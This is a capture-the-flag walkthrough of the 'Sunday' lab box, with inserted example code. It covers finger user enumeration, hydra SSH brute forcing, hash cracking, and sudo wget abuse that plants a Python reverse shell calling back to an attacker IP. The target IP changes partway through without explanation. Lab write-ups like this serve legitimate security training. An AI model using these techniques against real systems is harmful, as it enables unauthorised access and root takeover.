SUNDAY

Burak Dirlik
4 min read · 4 days ago


The target IP is 10.129.32.188. Let's start with a service and OS scan:


nmap -sC -sV -O -T4 -oN nmap.txt 10.129.32.188

The scan finds ports 79, 111 and 515 open. A second, more thorough script scan of just those ports does not change the picture:

nmap -p 79,111,515 -sV -oA full-scripts 10.129.32.188

Port 79 is running the finger service.

First, we check whether any users are currently logged in (a finger request with an empty username lists logged-in users).

Pentestmonkey has a user-enumeration tool for the finger service, finger-user-enum.

Usage (the -U wordlist is a list of first names from SecLists, -t is the target):

./finger-user-enum.pl -U /home/kali/Downloads/Seclist-master/Usernames/Names/names.txt -t 10.129.32.188

Now we can compare finger's reply for a name that exists against its reply for one that does not; the replies differ, and that difference is what the tool keys on:
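To make that comparison concrete, here is an added example (my own code, not from the post or from finger-user-enum) of the technique: it speaks the finger protocol directly, takes a baseline reply for a random name that cannot exist, and reports every candidate whose reply differs from that baseline. Because it has to run offline, it also starts a tiny fake finger daemon on loopback whose user table and Solaris-style reply layout (a Name column for known users, "???" for unknown ones) are constructed assumptions; against the real box you would call enumerate_users with the target address and port 79.

```python
import re
import secrets
import socket
import socketserver
import threading

# Constructed user table for the fake finger daemon below (an assumption for
# the demo, not the real box): login -> full name.  Unlisted names are unknown.
FAKE_USERS = {"root": "Super-User", "sunny": "sunny", "sammy": "sammy"}


def finger_query(host, port, name, timeout=5.0):
    """Send one finger request (RFC 1288: the name followed by CRLF) and
    return the whole reply; the daemon closes the connection when it is done."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(name.encode() + b"\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def _normalise(reply, name):
    """Blank out the queried name so two replies can be compared structurally."""
    return re.sub(r"\b%s\b" % re.escape(name), "<NAME>", reply)


def enumerate_users(host, port, candidates):
    """finger-user-enum style check: fetch a baseline reply for a random name
    that cannot exist, then keep every candidate whose reply differs from it."""
    bogus = "zz" + secrets.token_hex(6)
    baseline = _normalise(finger_query(host, port, bogus), bogus)
    return [name for name in candidates
            if _normalise(finger_query(host, port, name), name) != baseline]


class _FakeFingerHandler(socketserver.StreamRequestHandler):
    """Minimal fingerd answering in the layout assumed for the demo: known
    users get a Name/TTY line, unknown users get '???' in the Name column."""
    def handle(self):
        name = self.rfile.readline().decode(errors="replace").strip()
        header = "Login       Name               TTY         Idle    When    Where\n"
        if name in FAKE_USERS:
            line = "%-11s %-18s console      <Oct 14 10:15>\n" % (name, FAKE_USERS[name])
        else:
            line = "%-11s ???\n" % name
        self.wfile.write((header + line).encode())


class _FakeFingerd(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True


def start_fake_fingerd():
    """Start the fake daemon on a free loopback port; returns (server, port)."""
    server = _FakeFingerd(("127.0.0.1", 0), _FakeFingerHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def demo():
    """Run the enumeration against the fake daemon and return the hits."""
    server, port = start_fake_fingerd()
    try:
        return enumerate_users("127.0.0.1", port, ["root", "sunny", "sammy", "nobody_here"])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo())
    # Against the real target: enumerate_users("10.129.32.188", 79, names)
```

The baseline-diff approach is more robust than grepping for a fixed "no such user" string, because it adapts to whatever layout the remote fingerd uses; the only thing it needs is that the reply for a real account differs from the reply for a made-up one.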

The enumeration gives us a username but nothing that hints at a password, so we brute-force SSH, which on this box listens on the non-standard port 22022, with hydra (-l fixes the username, -P supplies the wordlist, -V prints every attempt, -I ignores a stale restore file):

hydra -V -I -l sunny -P '/usr/share/wordlists/rockyou.txt' 10.129.32.188 ssh -s 22022

Hydra finds a valid pair at the end of the brute force:

sunny:sunday

SSH connection:

ssh -p 22022 sunny@10.129.32.188

user.txt is not readable as sunny, so we need to escalate privileges.

However, /etc/passwd is readable and contains password hashes for sammy and sunny. Hashes normally live only in the root-readable /etc/shadow, so a readable hash is the misconfiguration here.

We need to crack these hashes to recover the passwords. I am using hashcat; the mode passed with -m is chosen from the hash prefix ($1$ is md5crypt, $5$ is sha256crypt, $6$ is sha512crypt), and rockyou.txt is the wordlist again.

We get both passwords:

sammy:cooldude!
sunny:sunday

With sammy's password we can read user.txt.

Next, let's see which commands each user can run as root with sudo -l.

We observe the following results from the sudo -l command:

  • The user sunny has permission to execute the /root/troll file with root privileges.
  • The user sammy can run wget as root, and because wget -O writes its download to any path we name, that lets sammy overwrite any root-owned file.

To exploit this, we’ll leverage Sammy’s sudo privileges to overwrite the /root/troll file and insert a shell into it. Then, using Sunny's sudo privileges, we'll execute the /root/troll file to escalate our shell to a root shell.

Target IP: 10.10.10.76
Attacker IP: 10.10.16.3 --> this is the address written into shell.py

shell.py:

#!/usr/bin/python
# Reverse shell: connects back to the attacker's listener and hands it an
# interactive /bin/sh. The shebang matters: sudo executes /root/troll
# directly, so the kernel needs it to pick the interpreter.

import socket
import subprocess
import os

# Connect to the attacker machine on the port the netcat listener uses (444)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.16.3", 444))
# Point stdin, stdout and stderr at the socket so the shell talks over it
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# Spawn an interactive shell; it inherits the redirected descriptors
p=subprocess.call(["/bin/sh", "-i"])

Command executed as sammy, with shell.py served over HTTP from the attacker machine on port 4444 (this overwrites /root/troll with the contents of shell.py; wget -O truncates and rewrites the existing file in place, so its executable bit is kept):

sudo wget http://10.10.16.3:4444/shell.py -O /root/troll

Then, as sunny:

sudo /root/troll

These two commands have to be run back to back, in two separate sessions (one as sammy, one as sunny), because /root/troll is reset to its original contents every 5 seconds; anything slower than that window gets the original file back. With a netcat listener waiting on port 444 on the attacker machine, the reverse shell comes back as root and we can read root.txt.
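To show why the timing matters, here is an added example (my own code, not from the post) that models the race in a temporary directory: a background thread plays the role of whatever restores /root/troll every few seconds, overwrite_and_run plays sammy's wget -O followed by sunny's sudo, and the delay between the two steps decides whether the payload or the original runs. The stand-in "troll" script, the stand-in payload and the reset interval are all constructed assumptions for the demo; nothing here touches the real box.

```python
import os
import stat
import subprocess
import tempfile
import threading
import time

# Constructed stand-ins (assumptions for the demo, not the real files)
ORIGINAL = "#!/bin/sh\necho 'troll: nothing to see here'\n"      # plays /root/troll
PAYLOAD = "#!/bin/sh\necho \"payload ran as $(id -un)\"\n"         # plays shell.py


def write_script(path, body):
    """Truncate and rewrite the file in place (what wget -O does), then make sure it is executable."""
    with open(path, "w") as f:
        f.write(body)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)


class Resetter:
    """Background thread that puts ORIGINAL back every `interval` seconds,
    mimicking the periodic reset of /root/troll described in the writeup."""
    def __init__(self, path, interval):
        self.path, self.interval = path, interval
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._loop, daemon=True)

    def _loop(self):
        # Event.wait returns False on timeout, so this fires every `interval`
        # seconds until stop() is requested.
        while not self._stop.wait(self.interval):
            write_script(self.path, ORIGINAL)

    def __enter__(self):
        self._thread.start()
        return self

    def __exit__(self, *exc):
        self._stop.set()
        self._thread.join()


def overwrite_and_run(path, delay):
    """sammy's step (overwrite), a pause of `delay` seconds, then sunny's step (execute).
    Returns what the executed file printed."""
    write_script(path, PAYLOAD)
    time.sleep(delay)
    return subprocess.run([path], capture_output=True, text=True).stdout.strip()


def demo(interval=1.0):
    """Run the race twice: once with no gap between the steps, once with a gap
    longer than the reset interval. Returns (fast_output, slow_output)."""
    with tempfile.TemporaryDirectory() as workdir:
        troll = os.path.join(workdir, "troll")
        write_script(troll, ORIGINAL)
        with Resetter(troll, interval):
            fast = overwrite_and_run(troll, 0.0)            # inside the window: payload runs
            slow = overwrite_and_run(troll, interval * 2.5)  # reset fires first: original runs
    return fast, slow


if __name__ == "__main__":
    fast, slow = demo()
    print("no delay      ->", fast)
    print("delay > reset ->", slow)
```

On the real target the two steps run as different users, so keep both sessions open with the commands already typed, fire sammy's wget, and immediately run sunny's sudo in the other session; the listener on port 444 should receive the root shell before the next reset.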
